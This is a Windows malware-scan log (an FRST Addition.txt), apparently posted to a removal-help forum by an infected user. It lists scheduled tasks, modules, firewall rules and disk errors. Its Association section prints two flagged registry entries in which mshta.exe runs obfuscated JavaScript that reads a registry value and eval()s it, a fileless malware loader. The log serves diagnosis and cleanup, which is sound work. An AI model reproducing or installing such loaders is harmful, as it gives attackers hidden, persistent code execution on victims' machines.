==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0FEEAAD8-76C7-4B2C-8F73-A21BB9D814D3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-12-25] (Google Inc.)
Task: {224A052F-EE78-4A67-B44E-75C5338C2C0A} - System32\Tasks\SafeZone scheduled Autoupdate 1482114147 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-03-22] (Avast Software)
Task: {2E1F1D2B-A7F0-47BE-9978-16429AE3489C} - System32\Tasks\Driver Support-RTMScan => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
Task: {2E451AE4-8D27-484B-B16F-D509AF77F27D} - System32\Tasks\Driver Support => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
Task: {599B1B91-94BB-47B7-B9DB-8C9A5FAB8A12} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-04-12] (AVAST Software)
Task: {6782147C-F074-4313-B1B6-20D506A59457} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-02-02] (Adobe Systems Incorporated)
Task: {69879873-87A5-4A6E-947D-918B26EA1025} - System32\Tasks\Driver Support-RTMUpdater => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
Task: {7165A1B7-F1E6-4C37-BB48-9ABE90C6D3E3} - System32\Tasks\DriverUpdate Scan => C:\Program Files\DriverUpdate\DriverUpdate.exe [2016-08-01] (SlimWare Utilities, Inc.)
Task: {9B71B164-D984-4853-BA08-95A906000F12} - System32\Tasks\Open URL by RoboForm => Rundll32.exe url.dll,FileProtocolHandler "hxxps://www.roboform.com/test-pass.html?aaa=KICMKMKMNJHMOMGMNMJJCNPMNJMJMJCNLMJMHMKMCNOJOMOJLJCNPMJJNMHMOMOJMMJJMJHMJMOJJNJICMHMCNMMCNOMFMOMOMCNPMCNGMJMPMPMFMJMCNOMCNIMJMPMOMCNNMJNPICMPMFMEKMICNJJCKFMNMHMJMJNHICMOMPMKJCJMIJNBJCMHJGJDJLIAJBJJNKJCMJNNICMJNDJCMKJBJJNMJCMPMF (the data entry has 42 more characters).
Task: {A432DC7B-B85A-4B9D-970A-1E7753295BF1} - System32\Tasks\Run RoboForm TaskBar Icon => C:\Program Files\Siber Systems\AI RoboForm\RoboTaskBarIcon.exe [2017-04-12] (Siber Systems)
Task: {ACA2CFD2-877B-4148-BCDB-579CDEBD6855} - System32\Tasks\Games\UpdateCheck_S-1-5-21-3292114827-816517840-1514174382-1000
Task: {AEBAC022-C4BF-468A-A3B0-A99EF616D1AA} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2016-12-25] (Google Inc.)
Task: {B65BA30C-B2B6-46F4-B376-2009DA700634} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-03-03] (Piriform Ltd)
Task: {BF5F61F7-5B68-424F-BC5D-73C6030B203E} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-27] (AVAST Software)
Task: {C24F7343-825C-44A5-A240-4432598C8B17} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2017-04-12] (Adobe Systems Incorporated)
Task: {E572A5EE-C9B3-477C-B58F-EE074238EB6E} - System32\Tasks\DriverUpdate Startup.job => C:\Program Files\DriverUpdate\DriverUpdate.exe [2016-08-01] (SlimWare Utilities, Inc.)
Task: {E753F27A-B7AA-4831-A49E-9186D40D7565} - System32\Tasks\Driver Support-RTMRules => C:\Program Files\Driver Support\DriverSupport.exe [2016-06-07] (PC Drivers Headquarters)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\DriverUpdate Scan.job => C:\Program Files\DriverUpdate\DriverUpdate.exe
==================== Shortcuts =============================
(The entries could be listed to be restored or removed.)
==================== Loaded Modules (Whitelisted) ==============
2017-04-12 14:40 - 2017-04-12 14:40 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00176480 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00653520 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00230632 _____ () C:\Program Files\AVAST Software\Avast\streamback.dll
2017-04-13 07:45 - 2017-04-13 07:45 - 06015544 _____ () C:\Program Files\AVAST Software\Avast\defs\17041300\algo.dll
2017-04-12 14:39 - 2017-04-12 14:39 - 00134920 _____ () c:\Program Files\AVAST Software\Avast\vaarclient.dll
2017-04-12 14:40 - 2017-04-12 14:40 - 00230632 _____ () c:\Program Files\AVAST Software\Avast\StreamBack.dll
2016-07-28 13:02 - 2016-07-28 13:02 - 00093528 _____ () C:\Program Files\DriverUpdate\CrashRpt.dll
2016-12-18 22:20 - 2016-12-18 22:20 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2017-04-12 14:39 - 2017-04-12 14:39 - 00293936 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2016-08-01 10:37 - 2016-08-01 10:37 - 00076120 _____ () C:\Program Files\SlimWare Utilities\Services\CrashRpt.dll
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website
ESTICON_favicon-321416266 [37438]AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website
ESTICON_favicon-36986836 [37438]AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website
ESTICON_favicon1520975912 [37438]AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website
ESTICON_favicon62545966 [37438]AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website
ESTICON_favicon825986531 [37438]AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website
ESTICON_Goldbox16._CB200960310_-1866390539 [2814]AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_0favicon-919252660 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_1favicon871367106 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_2favicon717581649 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_3favicon364977008 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\AmazonSmil.website:TASKICON_4favicon-1245215657 [37438]
AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_0sm_weather-1654153164 [2302]
AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_1sm_news888331756 [2302]
AlternateDataStreams: C:\Users\hilton\Desktop\BING.website:TASKICON_2sm_maps-889989894 [2302]
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" value will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcapexe => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeplk.sys => ""="Driver"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Software\Classes\49c4f: "C:\Windows\system32\mshta.exe" "javascript:WJc2I4C="TtZ";I7o0=new ActiveXObject("WScript.Shell");ivp77AS="IJm09";n30PTY=I7o0.RegRead("HKCU\\software\\jtosjykc\\khzqgpmhk");Wdq2Upz="eTw";eval(n30PTY);zfuWFiF0="36B";" <===== ATTENTION
HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Software\Classes\89873: "C:\Windows\system32\mshta.exe" "javascript:A2FZidrE="CPVI";S19T=new ActiveXObject("WScript.Shell");phe0u="W1NGquh";OsT4c0=S19T.RegRead("HKCU\\software\\ovbrx\\adbychucad");bE4RCT="yLuy";eval(OsT4c0);siDwFRU9="iAbe";" <===== ATTENTION
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
IE trusted site: HKU\S-1-5-21-3292114827-816517840-1514174382-1000\...\dell.com -> dell.com
==================== Hosts content: ===============================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 22:04 - 2016-07-17 14:58 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-3292114827-816517840-1514174382-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\hilton\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 209.18.47.61 - 209.18.47.62
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{0DC8D093-6A4A-46DF-81F7-51A31BA38190}] => (Allow) C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
FirewallRules: [TCP Query User{AC689693-B971-449C-8EA9-AC51E5D70F9C}C:\users\hilton\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\hilton\appdata\local\amazon music\amazon music helper.exe
FirewallRules: [UDP Query User{25F20FE1-CB5D-4B09-9160-3C9094A6B8A8}C:\users\hilton\appdata\local\amazon music\amazon music helper.exe] => (Allow) C:\users\hilton\appdata\local\amazon music\amazon music helper.exe
FirewallRules: [{EAD2EC74-0D35-4D3D-900E-D48B9AB5AE26}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{E8207517-F4F1-4084-AD6C-988A4CDC999F}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{8F434A18-CE8D-45DC-AD17-44370BA521AC}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.561\SZBrowser.exe
FirewallRules: [{0941F852-CFCF-4D18-A6F8-20FE7A5ACEC5}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596_0\SZBrowser.exe
FirewallRules: [{30AFA8FF-C296-4B9A-AD9E-55C4A601D1BB}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe
==================== Restore Points =========================
05-04-2017 00:00:04 Scheduled Checkpoint
12-04-2017 03:00:16 Windows Update
12-04-2017 14:06:47 Restore Operation
12-04-2017 15:19:46 Windows Update
==================== Faulty Device Manager Devices =============
Name: avast! SecureLine TAP Adapter v3
Description: avast! SecureLine TAP Adapter v3
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TAP-Windows Provider V9
Service: aswTap
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
==================== Event log errors: =========================
Application errors:
==================
Error: (04/13/2017 12:33:33 PM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver
Error: (04/13/2017 11:10:02 AM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver
Error: (04/13/2017 11:08:16 AM) (Source: LMS) (EventID: 2) (User: NT AUTHORITY)
Description: LMS Service lost connection to HECI driver
Error: (04/12/2017 04:06:07 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\DriverUpdate\MFC80U.DLL".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
Error: (04/12/2017 04:05:49 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\DriverUpdate\MFC80U.DLL".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
Error: (04/12/2017 04:03:30 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.
Error: (04/12/2017 03:19:46 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine ConvertStringSidToSid(S-1-5-21-3292114827-816517840-1514174382-1000.bak). hr = 0x80070539, The security ID structure is invalid.
.
Operation:
OnIdentify event
Gathering Writer Data
Context:
Execution Context: Shadow Copy Optimization Writer
Writer Class Id: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
Writer Name: Shadow Copy Optimization Writer
Writer Instance ID: {460ea05d-9812-4601-ba62-5d80b9e346fa}
Error: (04/12/2017 03:19:44 PM) (Source: Microsoft-Windows-User Profiles Service) (EventID: 1533) (User: NT AUTHORITY)
Description: Windows cannot delete the profile directory C:\Users\TEMP. This error may be caused by files in this directory being used by another program.
DETAIL - The directory is not empty.
Error: (04/12/2017 03:18:15 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Activation context generation failed for "C:\Program Files\DriverUpdate\MFC80U.DLL".
Dependent Assembly Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0" could not be found.
Please use sxstrace.exe for detailed diagnosis.
Error: (04/12/2017 03:18:09 PM) (Source: ESENT) (EventID: 215) (User: )
Description: WinMail (3740) WindowsMail0: The backup has been stopped because it was halted by the client or the connection with the client failed.
System errors:
=============
Error: (04/13/2017 10:34:20 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
Error: (04/13/2017 10:34:13 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.
Error: (04/12/2017 03:18:25 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: The HomeGroup Listener service terminated with service-specific error %%-2147023143 = There are no more endpoints available from the endpoint mapper..
Error: (04/12/2017 03:07:57 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:07:54 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:07:34 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:07:31 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:07:05 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:07:03 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
Error: (04/12/2017 03:02:45 PM) (Source: Disk) (EventID: 7) (User: )
Description: The device, \Device\Harddisk0\DR0, has a bad block.
==================== Memory info ===========================
Processor: Intel(R) Core(TM)2 CPU 6300 @ 1.86GHz
Percentage of memory in use: 44%
Total physical RAM: 3316.61 MB
Available physical RAM: 1847.67 MB
Total Virtual: 6631.55 MB
Available Virtual: 5076.47 MB
==================== Drives ================================
Drive c: (Windows) (Fixed) (Total:1859.99 GB) (Free:1818.73 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: F9D26468)
Partition 1: (Active) - (Size=3 GB) - (Type=27)
Partition 2: (Not Active) - (Size=1860 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================
hope this works...
thanks
hefs
